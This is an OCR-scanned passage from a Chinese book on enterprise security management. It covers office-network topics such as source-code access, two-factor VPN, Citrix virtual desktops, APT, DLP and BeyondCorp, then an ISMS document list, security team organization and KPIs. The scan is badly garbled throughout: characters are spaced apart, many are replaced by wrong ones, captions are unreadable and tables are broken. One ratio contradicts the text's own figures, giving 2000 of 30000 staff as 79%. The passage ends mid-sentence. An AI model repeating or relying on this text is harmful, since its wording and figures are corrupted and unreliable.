平台 ， 最 新 的 源 代码 至 少 在 公司 的 平台 上 有 一 份 完整 的 拷贝 ， 同时 由 IT 
部 门 做 好 复制 和 灾 备 的 工作 。 





具体 在 权限 上 应 该 如 何 划分 ， 实 际 上 是 一 个 文化 的 问题 ， 而 不 是 一 
个 技术 问题 。 权 限 划分 得 越 死 ， 就 会 阻碍 学 习 和 知识 共 诗 。 有 些 人 可 以 
很 自 肾 地 说 他 们 可 以 几乎 不 受 限 制 地 查看 源 代码 ， 交 叉 甚 至 跨 部 门 做 
code review， 对 方 同 意 后 还 能 对 别人 的 代码 提交 修改 ， 在 工程 师 文化 比 
较 浓重 的 地 方 ， 权 限 划 分 也 相对 自由 。 有 些 人 说 自己 公司 研发 的 信息 安 
全 管理 做 得 如 何 好 ， 如 果 没 有 解决 用 户 体 验 问 题 其 实 都 不 值得 称道 。 换 
个 等 价 的 说 法 就 是 权限 只 是 研发 文化 的 一 种 写照 而 已 。 











如 果 有 人 觉得 上 述 比较 理想 化 ， 那 么 实际 一 点 就 是 把 各 产品 和 项 目 
分 开 来 ， 把 权限 划分 交 给 项 目的 技术 Leader， 由 他 上 自己 去 决定 组 员 的 有 具 
体 权 限 ， 如 果 他 所 在 的 项 目 组 很 多 都 是 新 员工 ， 心 理 没 太 多 后， 那 就 保 
守 一 把， 如 果 团 队 成 员 经 常 要 半夜 被 叫 起 床 应 急 修改 代码 ， 那 就 冤 松 一 
点 。 





遇 到 有 的 人 喜欢 擅 目 把 源 代码 同步 到 GitHub 这 种 地 方 去 的 ， 最 人 是 
把 密 钥 也 同步 出 去 ， 安 全 部 门 就 要 考虑 写 个 仆 虫 去 GitHub 抓 一 下 关键 


RS 


To 


12.6 ”远程 访问 


远程 访问 《例如 VPN 等 ) 最 大 的 问题 是 暴力 破解 ， 对 于 较 大 企业 而 
言 ， 一 般 者 会 选择 双 因 素 认 证 ， 很 多 人 都 接触 过 就 是 给 你 及 了 一 块 RSA 
4 





牌 〈 见 图 12-6) ， 更 加 谨慎 一 点 的 ， 在 外 网 收 邮件 也 用 双 因 素 认 证 。 





图 12-6 RSA h$ 





对 于 雇员 不 多 的 中 小 企业 ， 如 条 没有 太 多 远程 访问 的 需求 ， 管 理 员 





目 己 党 得 可 探 性 比较 强 ， 以 省 钱 为 初衷 可 以 选择 只 使 用 传统 的 口令 验证 





的 方式 ， 前 提 是 口令 长 度 足 够 ， 复 杂 度 也 足够 ， 或 者 开局 账号 锁定 货 
略 ， 并 定期 审计 登录 日 志 中 的 异常 行为 。 








12.7 feb RA 


Citrix EAU (CR AN TaD, KERR 012-7 TAN 0 


桌面 虚拟 化 产品 跟 以 前 的 NC (Network Computer) 很 像 ， 它 在 安全 
方面 的 先天 性 优势 是 数据 在 服务 器 上 ， 终 端 用 户 只 有 一 个 通过 RDP/ICA 
等 协议 得 到 一 个 远程 桌面 一 样 的 界面 ， 本 地 只 有 鼠标 键盘 ， 没 有 可 以 拷 
贝 数 据 的 USB 口 ， 在 物理 安全 上 比 传统 PC 高 出 不 少 ， 唯 一 的 入 口 就 是 用 
户 通 过 虚拟 机 《实际 上 虚拟 机 实例 在 服务 器 上 ) 和 Internet 的 连接 把 数据 
传 出 去 ， 因 为 虚拟 化 桌面 的 实际 计算 资源 都 在 IDC 机 房 的 服务 器 集群 
上 ， 所 以 在 安全 管理 上 有 两 大 便利 : 


Citrix XenDesktop 7 





Desktop OS 
Machines 





图 12-7 ”Citrix 的 技术 架构 


通过 严格 的 统一 安全 策略 可 以 使 终端 用 户 “ 能 做 的 事情 ?和 攻击 面 
大 幅 减 小 。 


原来 要 在 每 全 服务 器 上 安装 儿 毒 软件 ， 现 在 不 用 那么 暴 烦 了， 所 
有 的 入 侵 检 测 针对 “服务 器 ”做 就 可 以 。 


审计 比 原来 更 容易 做 ， 因 为 “都 集中 在 一 起 了 嘛 ”， 也 能 做 到 像 堡 
驹 主机 一 样 全 程 录 屏 ， 如 图 12-8 所 示 。 


>) ® mW & 





图 12-8 ”后台 会 话 录制 服务 架构 





如 采 以 防 泄漏 为 业务 目标 ， 基 于 虚拟 化 柬 面 的 安全 方案 是 比较 有 效 
的 ， 对 安全 和 IT 管理 者 来 说 也 比较 省 事 。 但 是 缺点 也 很 明显 ， 虚 拟 化 桌 
面 并 不 能 完全 代替 PC， 你 让 运 维 和 研发 ， 或 者 天 天 挂 在 游戏 产品 里 的 
PM 去 用 这 玩意 儿 ， 估 计 要 造反 了 。 





那 在 互联 网 公司 是 不 是 有 适合 的 使 用 场景 呢 ? 有 。 比 如 之 前 提 到 的 
轻 度 PC 用 户 ， 这 类 用 户主 要 以 网 页 浏览 、 文 字 编 辑 、 收 发 邮件 、 语 音 
和 IM 通 讯 为 主 ， 对 这 类 需求 而 言 ， 虚 拟 化 昌 面 足够 了 了 ， 因 此 这 个 方案 
可 以 在 较 大 的 公司 里 用 于 这 一 部 分 典型 用 户 ， 而 不 必 退 求 整个 公司 都 是 
大 一 统 的 方案 。 








以 前 很 多 人 有 技术 洁 兽 ， 公 司 的 安全 方案 必须 “一 刀 切 ”，“ 大 一 
统 "， 其 实 只 要 公司 大 过 一 定 的 规模 ， 真 没 必 要 。 


12.8 APT 














APT 这 个 词 在 安全 行业 很 流行 ， 但 是 对 甲 方 来 说 意义 并 不 是 那么 
大 ， 因 为 绝 大 多 数 企 业 都 不 太 可 能 去 开发 抗 APT 产 品 。 如 果 你 所 在 的 公 
司 尚 无 能 力 构建 一 文 在 业内 平均 水 平 以 上 的 攻防 型 团队 ， 那 么 抗 APT 这 
件 事 基 本 可 以 忽略 。 你 唯一 的 选择 是 购买 APT 检 测 产品 ， 但 是 这 类 产品 
的 结果 往往 不 太 “ 人 机 友好 ?， 没 个 安全 专家 压根 儿 判 断 不 了 。 抗 APT 本 
质 上 是 有 实力 的 安全 公司 和 极 少 数 实 力 与 安全 公司 对 等 的 甲 方 安全 团队 
玩 的 东西 。 








没有 实力 构建 强 有 力 的 安全 团队 ， 一 方面 代表 钱包 不 足 ， 一 般 也 不 
会 吸引 到 APT; 丸 一 方面 假如 真有 问题 ， 各 种 拉 术 手段 往往 还 不 如 熟人 
通过 黑 产 和 道上 朋友 告知 被 入 侵 的 “威胁 情报 ”更 现实 一 扣 。 


那 古 不 是 束 两 手 一 推 ， 完全 放弃 ， 无 事 可 做 ， 无 药 可 救 ? 也 不 尽 
然 。 可 以 分 成 几 个 维度 来 考虑 : 


如果 基本 的 安全 体系 尚 不 完备 ， 处 于 救火 阶段 或 者 安全 体系 化 建 
设 捉襟见肘 ，APT 可 以 先 放 一 边 不 管 。 如 果 目 里 缺乏 攻防 研究 能 力 ， 但 
是 有 钱 有 预算 ， 可 以 选择 APT 产 品 和 专家 外 包 服 务 ， 乙 方 是 否 尽 心 尽 力 
这 个 无 从 评价 ， 只 能 说 理论 上 有 这 个 渠道 。 














如果 是 有 攻防 型 的 安全 团队 ， 有 一 点 余力 ， 可 以 从 完善 既 有 入 侵 
检测 体系 入 手 ， 例 如 陷阱 网 络 和 密生 (honeypot) 是 一 种 门槛 和 成 本 不 
高 的 手段 ， 对 入 侵 者 有 一 定 的 诱导 和 发 现 能 力 。 








用 穴 艇 是 在 办 公 网 络 中 一 种 不 错 的 入 侵 检测 手段 ， 其 大 致 概念 如 疼 
12-9 所 示 。 但 是 在 大 型 生产 网 络 里 不 适合 作为 主要 手段 ， 而 应 该 是 一 种 
补充 手段 的 方案 。 
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图 12-9 BEREAN 





对 于 有 一 定安 全 实力 的 安全 团队 ， 应 该 退 求 的 是 寻找 和 建立 “大 数 
据 ?"， 参 与 业界 合作 。 随 着 时 间 的 推移 ，APT 的 解决 方 采 会 从 局 冷 逐 渐 
走 癌 平实 ， 抗 APT 的 厂商 和 解决 方案 会 越 来 越 多 ， 到 时 候选 择 会 更 多 ， 
所 以 上 述 观 点 仅 代 表 在 当前 时 间 点 的 结论 ， 不 能 代表 技术 和 市 场 发 展 之 
后 的 状态 。 











12.9 DLP 数据 防 泄密 





DLP (Data Loss Prevention) 的 主流 方案 目前 在 互联 网 行业 沙 地 可 
能 都 存在 有 不 小 的 问题 ， 在 兼容 用 户 体验 、 性 能 方面 仍 有 很 大 的 改进 空 
间 。 但 在 传统 行业 可 以 作为 比较 主要 的 方案 。 图 12-10 为 Symantec 的 DLP 
部 署 架构 ， 主 要 通过 终端 (Agent) 控制 ， 网 络 出 口 控 制 ， 以 及 检测 网 
络 流量 实现 。 其 他 的 厂商 还 包括 Websence 等 ， 具 体 可 以 参考 Gartner 魔 力 
象限 。 
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图 12-10 Symantec DLP 架构 


12.10 ”移动 办 公 和 边界 模糊 化 


2015 年 年 中 ，Google 发 布 了 beyondCorp 项 目 〈 如 图 12-11 所 示 ) ， 
宣称 其 办 公 网 络 将 取消 内 网 ， 这 意味 着 上 面 所 提 及 的 办 公 网 络 的 解决 方 
案 有 一 大 半 都 作废 了 。 其 基本 假设 是 ， 内 部 网 络 实际 上 跟 互联 网 一 样 危 
险 。 因 为 一 旦 内 网 边界 被 突破 ， 攻 击 者 就 很 容易 访问 到 企业 内 部 应 用 ; 
另外 现在 的 企业 越 来 越 多 采用 移动 和 云 技术 ， 边 界 保护 变 得 越 来 越 难 。 
所 以 干脆 一 视 同仁 ， 不 外 区 分 内 外 网 ， 用 一 致 的 手段 去 对 待 。 





Google Building 





图 12-11 ” Google 的 beyondcorp 项 目 


这 种 访问 模式 要 求 客 户 端 是 受 控 的 设备 ， 并 且 需 要 用 户 证 书 来 访 
问 。 访 问 有 通过 认证 服务 器 、 访 问 代 理 以 及 单 点 登录 等 手段 ， 由 访问 控 


制 引 擎 统一 管理 ， 不 同 用 户 、 不 同 资源 有 不 同 的 访问 权限 控制 ， 对 于 用 
尸 所 处 位 置 则 没有 要 求 。 也 就 是 说 ， 无 论 用 户 在 Google 办 公 大 楼 、 咖 啡 
厢 还 是 在 家 ， 都 是 一 样 的 访问 方式 ， 过 去 从 外 网 访问 需要 的 VPN 已 经 被 
废弃 。 而 所 有 员工 到 企业 应 用 的 连接 都 要 进行 加 密 ， 包 括 在 办 公 大 楼 里 
面 的 访问 。 可 以 说 ，Google 的 这 种 模式 已 经 彻底 打破 了 内 外 网 之 别 。 





总 之 ， 办 公 系 统 上 云 、 办 公 移 动 化 、 边 界 模糊 化 ， 这 种 方式 并 不 只 
是 技术 上 的 转变 ， 对 信息 安全 管理 也 有 不 小 的 挑战 。 目 前 对 于 绝 大 多 数 
互联 网 公司 ， 如 果 你 没有 一 支 专门 的 团队 用 于 内 部 开 管 理 ， 像 生产 网 络 
的 基础 架构 那样 走 上 自 研 之 路 ， 那 么 这 个 方案 也 仅仅 是 供 你 满足 一 下 眼 
球 而 已 。 





很 多 人 在 看 到 这 条 新 闻 时 ， 断 言 “内 网 ?已 经 没有 存在 的 意义 ， 其 实 
这 里 还 是 要 加 个 范围 ，Google 目 前 也 只 是 对 办 公 网 络 这样 做 ， 还 未 宣称 
对 生产 网 络 动 刀 子 ， 所 以 生产 网 络 和 办 公 网 络 应 该 还 是 两 种 不 同 风 格 的 
安全 管理 模式 。 








12.11 技术 之 外 


办 公 网 络 中 的 安全 问题 ， 因 为 涉及 “人 ”的 因 系 非常 多 ， 仅 靠 技 术 手 
段 不 能 完全 解决 ， 这 种 感觉 比 生产 网 络 更 严重 ， 即 单纯 依靠 技术 能 解决 
问题 的 占 比 更 低 。 就 算 你 什么 方案 都 有 ， 偶 侦 有 个 技术 好 一 点 的 程序 员 
装 了 个 调试 器 把 HIPS 进 程 干 择 了 ， 你 气 慎 的 跑 过 去 也 不 能 说 啥 ， 人 家 要 
用 调试 絮 是 正常 需求 ， 人 家 还 会 说 “ 史 ， 你 们 选择 的 安全 产品 也 不 咋 地 
电 ? 或 者 坏 一 点 的 干脆 装 作 什么 都 没 干 的 样子 。 用 内 行人 的 说 法 ， 很 多 
解决 方案 其 实 是 防 君子 不 防 小 人 的 ， 所 以 制订 “信息 安全 管理 制度 "也 是 
必须 的 ， 它 应 该 在 新 员工 入 职 塔 训 期间 惑 根植 于 履 员 的 意识 中 。 在 办 公 
网 络 安全 这 个 问题 上 ， 技 术 和 管理 的 比重 对 半 开 ， 两 手 都 要 抓 ， 两 手 都 
要 硬 。 
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http://www.citrix.com.cn/products/xendesktop/overview.html 


Google beyondCorp 


https://static.googleusercontent.com/media/research.google.com/en/us/pu 


第 13 半 ”安全 管理 体系 


安全 管理 体系 类 似 于 项 目 管理 的 PMBOK， 本 质 上 是 一 种 方法 论 和 
参考 维度 ， 禾 瘟 组 织 全 部 的 技术 活动 和 全 生命 周期 。 从 高 层 管理 的 角度 
看 ， 仍 然 属 于 组 织 技术 性 活动 的 方法 ， 仍 然 算 是 个 “技术 活 ”。 








在 理论 篇 里 提 到 过 安全 管理 体系 是 一 个 随 业 务 扩张 而 逐渐 完善 的 过 
程 ， 并 不 是 一 上 来 就 套 一 个 大 而 全 的 安全 体系 。 男 一 方面 也 与 组 织 的 文 
化 有 关 ， 在 比较 松散 的 非 流程 型 的 组 织 里 过 度 强 调 管理 措施 也 会 遭 到 抵 
触 行为 。 





过 去 的 管理 咨询 服务 通常 是 这 样 的 ， 履 善 ISO27001 的 ISMS 对 大 多 
数组 织 来 说 是 足够 的 ， 但 咨询 服务 的 问题 可 能 类 似 于 麦肯锡 做 咨询 一 
样 ， 理 论 都 对 ， 但 本 地 化 的 实践 还 需要 一 个 因地制宜 的 过 程 。 另 一 方面 
国际 标准 代表 的 是 : 普遍 适用 场景 下 的 最 佳 实践 ， 不 代表 在 某 个 具体 场 
景 下 的 最 佳 实践 ， 所 以 当 企 业 自 喘 认 为 局 部 进入 某 个 领域 的 最 佳 实践 的 
时 候 就 可 以 把 那些 参考 物 扔 掉 ， 这 并 不 是 说 对 国际 标准 毫 无 认 知 的 人 可 
以 对 此 噬 之 以 鼻 ， 仅 仅 对 跨 过 那 道 坎 的 人 才 有 现实 意义 。 











表 13-1 取 自 过 去 的 ISMS 〈 信 息 安全 管理 体系 ) 咨询 ， 主 要 是 根据 
BS17799 的 内 容 做 安全 管理 规划 。 


表 13-1 ISMS 文 件 列表 


文件 类 别 
1. 适用 性 声明 
2.ISMS 手册 


A.05 信息 安全 策略 


A.06 信息 安全 组 织 


A.07 资产 管理 


A.08 人 力 资源 安全 


A.09 物理 与 环境 安全 


A.10 通信 与 操作 管理 


文件 名 称 
XXX ISMS 适用 性 声明 


XXX ISMS 手册 


信息 安全 策略 管理 指南 


规章 制度 维护 制度 


信息 安全 规章 制度 审阅 更 新 记录 
信息 安全 组 织 管理 指南 


信息 安全 组 织 体系 


外 部 机 构 (权力 机 构 、 行 业 协 会 、 
务 商 ) 联络 表 


资产 管理 指南 
数据 安全 策略 


公司 秘密 保护 管理 规定 
人 力 资源 安全 管理 指南 


安全 培训 管理 制度 
安全 培训 教育 策略 
公司 培训 考核 记录 
培训 请 假 单 


培训 缺勤 人 员 记 录 表 
物理 与 环境 安全 管理 指南 
办 公 区 安全 管理 制度 


机 房 安全 管理 制度 
机 房 环境 管理 规范 
物理 安全 策略 


(临时 来 访 者 ) 进入 机 房 协 议 


机 房 出 入 登记 记录 
机 房 定期 检查 表 


机 房 门禁 系统 日 志 审 核 记录 


机 房 准 入 人 员 记 录 
来 访客 人 登记 表 
门禁 卡 用 户 记录 


外 来 工作 人 员 使 用 公司 资源 申请 表 
通信 与 操作 管理 指南 


病毒 防护 管理 制度 


管理 员 审计 管理 制度 


日 志 审 核 管理 制度 


数据 备份 恢复 管理 制度 


安全 审计 策略 
病毒 防护 策略 





Pi 


= 


X 
j 





文件 编号 
ISMS-SOA 
ISMS-MAN 
ISMS-MG-A.05-01 
ISMS-MP-A.05-01 
ISMS-TR-A.05-01 
ISMS-MG-A.06-01 
ISMS-MP-A.06-01 
ISMS-MP-A.06-02 


ISMS-MG-A.07-01 
ISMS-MP-A.07-01 
ISMS-MP-A.07-02 
ISMS-MG-A.08-01 
ISMS-MP-A.08-01 
ISMS-MP-A.08-02 
ISMS-TR-A,08-01 

ISMS-TR-A.08-02 
ISMS-TR-A.08-03 
ISMS-MG-A.09-01 
ISMS-MP-A.09-01 
ISMS-MP-A.09-02 
ISMS-MP-A.09-03 
ISMS-MP-A.09-04 
ISMS-MP-A.09-05 
ISMS-TR-A.09-01 

ISMS-TR-A.09-02 
ISMS-TR-A.09-03 
ISMS-TR-A.09-04 
ISMS-TR-A.09-05 
ISMS-TR-A.09-06 
ISMS-TR-A.09-07 
ISMS-MG-A.10-01 
ISMS-MP-A.10-01 
ISMS-MP-A.10-02 
ISMS-MP-A.10-03 
ISMS-MP-A.10-04 
ISMS-MP-A.10-05 
ISMS-MP-A.10-06 


( 续 ) 


文件 类 别 文件 编号 
网 络 安全 策略 ISMS-MP-A.10-07 
ISMS-TR-A. 10-01 
ISMS-TR-A. 10-02 
ISMS-TR-A.10-03 
ISMS-TR-A.10-05 
ISMS-TR-A. 10-06 
ISMS-TR-A.10-07 
ISMS-TR-A. 10-08 


计算 机 病毒 问题 处 理 纪 录 ISMS-TR-A.10-09 
计算 机 病毒 预警 提示 纪 ISMS-TR-A.10-10 


i 示 纪 录 
临时 中 断 公司 资源 使 用 能 力 纪录 ISMS-TR-A.10-11 
pubes iy 
i Hits 





A. 10 通信 与 操作 管理 ISMS-TR-A.10-12 
ISMS-TR-A.10-13 
ISMS-TR-A.10-14 

新 入 网 .临时 设备 防 病毒 软件 安装 登记 | = ISMS-TR-A.10-15 
纪录 
ISMS-TR-A.10-16 
ISMS-TR-A.10-17 
ISMS-TR-A.10-18 
ISMS-TR-A.10-19 
ISMS-TR-A.10-20 
ISMS-TR-A.10-21 
ISMS-TR-A. 10-22 


主机 操作 系统 日 志 审核 记录 ISMS-TR-A.10-23 
访问 控制 管理 指南 ISMS-MG-A.11-01 


访 
计算 机 终端 安全 管理 制度 ISMS-MP-A.11-02 
办 





ISMS-MP-A.11-03 
ISMS-MP-A.11-04 
ISMS-MP-A.11-05 
ISMS-MP-A. 11-06 
A.11 访问 控制 ISMS-TR-A.11-01 
ISMS-TR-A.11-02 


操作 系统 普通 权限 账号 记录 ISMS-TR-A.11-03 


操作 系统 账号 开通 申请 ISMS-TR-A.11-04 


第 三 方 远程 接 人 系统 用 户 审批 记录 ISMS-TR-A.11-05 


系统 测试 记录 ISMS-TR-A.11-06 


系统 管理 员 用 户 帐号 权限 授权 记录 ISMS-TR-A.11-07 








( 续 ) 
文件 类 别 文件 名 称 文件 编号 
系统 临时 帐号 回收 禁用 记录 ISMS-TR-A.11-08 
系统 临时 帐号 申请 记录 ISMS-TR-A.11-09 
系统 用 户 帐 号 登记 记录 ISMS-TR-A.11-10 
系统 帐号 口令 检查 记录 ISMS-TR-A.11-11 
系统 帐号 口令 修改 记录 ISMS-TR-A.11-12 
应 用 系统 超级 管理 员 帐 号 审批 记录 ISMS-TR-A.11-13 
应 用 系统 帐号 审批 记录 ISMS-TR-A.11-14 
终端 接 入 . 断 开 局 域 网 络 申请 表 ISMS-TR-A.11-15 
信息 系统 的 获取 、 开 发 和 维护 管理 指南 | ISMS-MG-A.12-01 
系统 安全 管理 制度 ISMS-MP-A.12-01 
系统 变更 管理 制度 ISMS-MP-A.12-02 
应 用 系统 软件 开发 管理 制度 ISMS-MP-A.12-03 
工程 安全 策略 ISMS-MP-A.12-04 
系统 安全 策略 ISMS-MP-A.12-05 
应 用 安全 策略 ISMS-MP-A.12-06 
A.12 信息 系统 的 获取 、 开 发 和 维护 系统 变更 需求 申请 表 ISMS-TR-A.12-01 
系统 重大 操作 登记 记录 ISMS-TR-A.12-02 
系统 重大 操作 申请 记录 ISMS-TR-A.12-03 
应 用 系统 软件 上 线 观 察 报告 ISMS-TR-A.12-04 
应 用 系统 软件 上 线 审批 表 ISMS-TR-A.12-05 
应 用 系统 上 线 操作 步 又 记录 表 ISMS-TR-A.12-06 
应 用 系统 上 线 流程 记录 表 ISMS-TR-A.12-07 
月 度 网 络 安全 扫描 记录 ISMS-TR-A.12-08 
信息 安全 事故 管理 指南 ISMS-MG-A.13-01 
事故 事件 管理 制度 ISMS-MP-A.13-01 
应 急 安全 管理 制度 ISMS-MP-A.13-02 
应 急 响应 预案 ISMS-MP-A.13-03 
A.13 信息 安全 事故 管理 应 急 安全 策略 ISMS-MP-A.13-04 
事故 事件 登记 记录 ISMS-TR-A.13-01 
事故 事件 申告 记录 ISMS-TR-A.13-02 
事故 事件 支持 人 员 联 系 表 ISMS-TR-A.13-03 
问题 分 类 汇总 月 报表 ISMS-TR-A.13-04 
业务 连续 性 管理 指南 ISMS-MG-A.14-01 
业务 连续 性 管理 程序 ISMS-MP-A.14-01 
XXX BCP - 火灾 ISMS-MP-A.14-02 
BCPDRP 申请 表 ISMS-TR-A.14-01 
符合 性 管理 指南 ISMS-MG-A.15-01 
适用 法 律 法 规 及 其 他 要 求 一 览 表 ISMS-MP-A.15-01 


A.11 访问 控制 








A.14 业务 连续 性 管理 


A.15 符合 性 


上 面 的 表格 虽然 看 上 去 有 点 过 时 ， 但 对 于 没 太 多 体系 化 思维 的 技术 
人 员 来 说 还 是 有 参考 的 音义 。 当 你 看 ISO27001 看 的 云 里 筋 里 的 时 候 ， 青 
看 看 这 些 或 许 能 有 所 局 发 。 








13.1 相对 “全 集 ” 


这 里 所 说 的 全 集 其 实 算 不 上 是 合集， 只 是 一 个 相对 的 、 偏 实 操 的 集 
合 ， 真 正 意义 上 的 全 集 引 用 了 国际 上 的 诸多 标准 、 指 南 和 最 佳 实践 ， 过 
于 复杂 而 庞大 ， 对 初 入 安全 管理 的 人 很 容易 陷入 汪洋 大 海 找 不 到 出 路 。 
也 曾经 看 到 过 某 大 型 的 互联 网 公司 在 讲 安全 体系 ， 可 能 是 怕 看 官 觉 得 自 
己 层次 不 够 高 ， 所 以 套 了 很 多 高 大 上 的 模型 ， 但 在 实际 工作 中 很 多 类 目 
都 不 会 触及 。 所 以 下 面 的 这 张 图 是 站 在 安全 职能 的 角度 看 平时 要 做 哪些 
事情 ， 那 些 不 太 常 用 的 ， 或 者 比较 高 层次 的 IT 治理 的 内 容 就 不 罗列 其 
中 。 如 图 13-1 所 示 。 














图 13-1 信息 安全 全 集 


几 家 大 厂 套 的 都 是 SDL 的 模型 ， 这 里 并 没有 直接 引用 SDL， 还 是 以 
ITIL+SDL+SAMM 为 骨架 ， 尽 可 能 地 结合 公司 研 运 一 体 化 的 价值 链 过 
程 ， 同 时 又 反映 出 安全 在 不 同 的 维度 分 别 做 哪些 事 。 


当然 里 面 也 有 很 多 内 容 未 放 进 去 ， 例 如 供应 链 安全 、 外 部 开放 与 合 


作 等 。 


13.2 组 织 


对 于 比较 小 的 安全 团队 而 言 ， 其 实 不 需要 很 严格 的 划分 ， 甚 至 不 需 
要 引入 过 分 复杂 的 团队 管理 。 进 一 步 发 展 全 20 人 规模 以 后 可 能 需要 做 一 
些 简单 的 工种 划分 。 对 于 比较 大 型 的 公司 及 平台 ， 安 全 团队 规模 也 比较 
K, WDA PBK: 一 队 做 传统 的 攻防 对 抗 领域 ， 一 队 做 俩 于 业务 安全 
上 的 “ 风 控 ?。 图 13-2 仅 作为 组 织 划 分 的 示例 ， 现 实 中 不 一 定 按照 这 样 
分 。 


攻防 安全 团队 业务 安全 国 队 
天 一 一 一 | 一 | 
EE ED ee 
; 账号 风 控 体 系 ” 主 要 业务 场景 ”主要 业务 场景 
反 扫 号 之 一 的 风 控 ， 之 二 的 风 控 ， 
反 撞 库 例如 反 欺 诈 例如 交易 安全 











渠道 建设 web 安全 安全 运 维 
漏洞 收集 App 安全 网 络 安全 
漏洞 根 因 分 析 面向 自 有 产品 系统 安全 
应 急 响应 的 安全 方案 ”体系 建设 
安全 技术 研究 SDL 的 实践 


图 13-2 ”大 型 安全 部 门 组 织 结构 图 示例 











当 安 全 团队 发 展 到 一 定 规 模 后 会 发 生 一 些 变 化 ， 团 队 小 的 时 候 基 本 
都 专注 于 安全 本 里 ， 大 部 是 做 纯 安全 的 人 ， 到 了 一 定 规 模 以 后 ， 比 如 目 
己 的 安全 产品 运营 ， 束 需要 大 数据 的 文 持 ， 安 全 团队 本 身 会 引入 产品 经 
理 、 开 发 、 运 维 、DBA 等 各 种 职能 的 人 ， 使 得 它 看 上 去 像 一 条 业务 线 。 








而 风 探 本质 上 就 是 一 个 BI 类 型 的 业务 ， 自 然 也 包括 了 研发 、PM、 运 
维 、 数 据 分 析 、 后 台 人 工 审 核 等 各 种 各 样 的 职能 。 不 再 是 一 个 传统 意义 
上 的 由 攻防 人 员 组 成 的 安全 小 作坊 ， 对 团队 管理 者 的 要 求 也 会 远 远 超出 
安全 本 身 ， 最 好 是 集 安全 、 研 发 、 运 维 视野 于 一 身 的 全 局 技术 管理 者 ， 
只 懂 攻 防 、 不 懂 架 构 会 比较 累 ， 反 之 亦 然 。 























对 于 涉及 安全 产品 自 研 的 团队 ， 可 以 独立 也 可 以 归 入 应 用 安全 和 架 
构 安全 的 分 文 里 ， 例 如 Web 代 码 审计 和 WAF 研 发 可 以 归 入 一 组 ， 这 一 组 
既 负 责 发 现 问题 义 负 责 防御 产品 ， 知 识 和 思路 上 一 脉 传 承 。 











在 团队 规模 方面 ， 目 前 国内 最 大 的 两 家 互联 网 公司 阿里 和 腾讯 ， 其 
安全 团队 《〈 含 业务 安全 / 风 控 ) 的 规模 大 约 在 2000 多 人 左右 〈 此 数据 来 
源 于 非 官方 渠道 ) ， 两 家 公司 的 员工 总 数 均 为 30000 多 人 ， 安 全 技术 人 
员 大 约 占 了 79%， 安 全 体系 内 部 ， 业 务 安全 含 风 控 团 队 通常 是 攻防 的 2 倍 
以 上 。 安 全 团队 的 规模 与 业务 成 长 的 适应 性 比例 参见 表 13-2。 





表 13-2 ”安全 团队 规模 与 业务 适应 性 比例 

















业务 规模 总 人 数 攻防 类 业务 安全 类 
1 万 服务 器 60-80 20+ 40+ 
3 ~ 5 万 服务 器 120+ 30-40 80+ 
10 万 + 服务 器 200 50-60 120+ 
30 ~ 50 FAR Ar 800 ~ 1000 200+ 500+ 














安全 团队 的 规模 其 实 不 能 只 拿 IDC 的 服务 器 规模 来 衡量 ， 跟 业务 复 
杂 程 度 也 有 很 大 的 关系 ， 同 质 类 型 的 业务 多 ， 例 如 10 万 台 服 务 器 上 跑 的 


都 是 单一 产品 ， 那 安全 文 持 团队 惑 不 一 定 需要 那么 多 人 ， 如 果 是 弱 账 号 
体系 ， 没 太 多 业务 之 痛 ， 风 控 团 队 的 规模 也 可 大 幅 缩减 ， 有 具体 还 要 看 应 
用 场景 。 





忆 体 来 说 ， 安 全 的 组 织 结构 如 何 划 分 是 一 个 比较 灵活 的 话题 ， 后 面 
会 在 笔者 技术 博客 中 继续 做 专题 分 至。 





13.3 KPI 


对 于 安全 这 个 不 直接 产生 利润 的 职能 而 言 ， 其 KPI 衡量 一 直 是 业界 
难题 ， 就 像 程序 员 这 个 工种 无 法 简单 通过 单位 时 间 的 代码 行 数 和 bug 率 
来 评价 一 个 人 的 能 力 产 出 。 业 界 有 IT 平衡 计 分 卡 这 样 的 工具 提供 了 高 续 
度 的 参考 ， 如 图 13-3 所 示 。 





把 IT 部 门 映 射 到 安全 部 门 就 是 安全 管理 者 需要 考虑 的 内 容 。 在 “IT 
用 户 满意 度 " 这 个 角度 ， 主 要 是 两 个 客户 ， 一 个 内 部 客户 ， 另 一 个 是 外 
部 客户 。 内 部 客户 是 使 用 和 依赖 安全 能 力 的 兄弟 部 门 ， 例 如 业务 线 、 运 
维 、 研 发 等 职能 。 对 他 们 而 言 是 否 能 获得 安全 团队 的 高 质量 的 文 持 ， 尽 
可 能 不 降低 上 自身 的 工作 效率 ， 例 如 使 用 安全 部 门 提供 的 安全 产品 对 业务 
系统 性 能 影响 很 低 ， 接 入 和 变更 做 到 业务 侧 “ 无 感知 ”状态 ， 不 要 出 现 一 
扫描 就 性 能 波峰 ， 一 升级 变更 就 断 网 的 事情 。 其 实 每 一 个 部 门 都 暗含 了 
一 个 心理 ， 那 就 是 我 得 到 安全 能 力 的 时 候 不 需要 我 付出 太 多 《〈 线 上 变 
更 、 性 能 损耗 、 二 次 开 及 、 多 一 道 流程 、 索 琐 的 安 厂 调试 .……) 。 对 于 
外 部 客户 ，2C 类 型 的 业务 那 就 是 线 上 的 用 户 ， 安 全 最 大 的 需求 就 是 保障 
用 户 数 据 安全 ， 保 护 用 户 隐 私 ， 不 损失 用 户 体验 。 





IT 用 户 满意 度 


视角 : 用 户 如 何 看 待 IT 部 门 的 服务 
使 命 : 成 为 组 织 满意 的 IT 服务 部 门 
目标 : 

* 提供 最 佳 IT 服务 

“与 IT 使 用 部 门 建立 伙伴 关系 

“让 IT 使 用 部 门 满意 





视角 : 管理 层 怎样 评价 IT 部 门 视角 : IT 是 否 满 足 未 来 发 展 挑战 
使 命 : 获得 IT 投资 的 价值 贡献 使 命 : 适应 未 来 发 展 机 遇 和 挑战 
目标 : 目标 : 

+ 提供 IT 服务 的 业务 价值 + 保障 IT 人 员 的 培训 和 教育 
“有 效 控制 I 花费 “ 提高 IT 人 员 的 专业 水 平 

“ 提高 IT 服务 支持 的 效率 + 提高 IT 新 技术 的 研究 能 力 


IT 内 部 过 程 


视角 : IT 服务 流程 的 效果 和 效率 
使 命 : 高 效 提 供 IT 产品 和 服务 
目标 : 

+ 提高 软件 开发 效率 

+ 提高 IT 设备 运营 效率 

+ 提高 IT 服务 支持 的 效率 


图 13-3 ITF iE 





在 “IT 价值 贡献 > 这 个 维度 上 成 本 很 容易 计算 ， 但 是 价值 却 比 较 难 衡 
量 。ROI 则 一 直 是 高 层 管理 者 需要 考虑 的 事情 。 这 个 业界 难题 比较 难以 
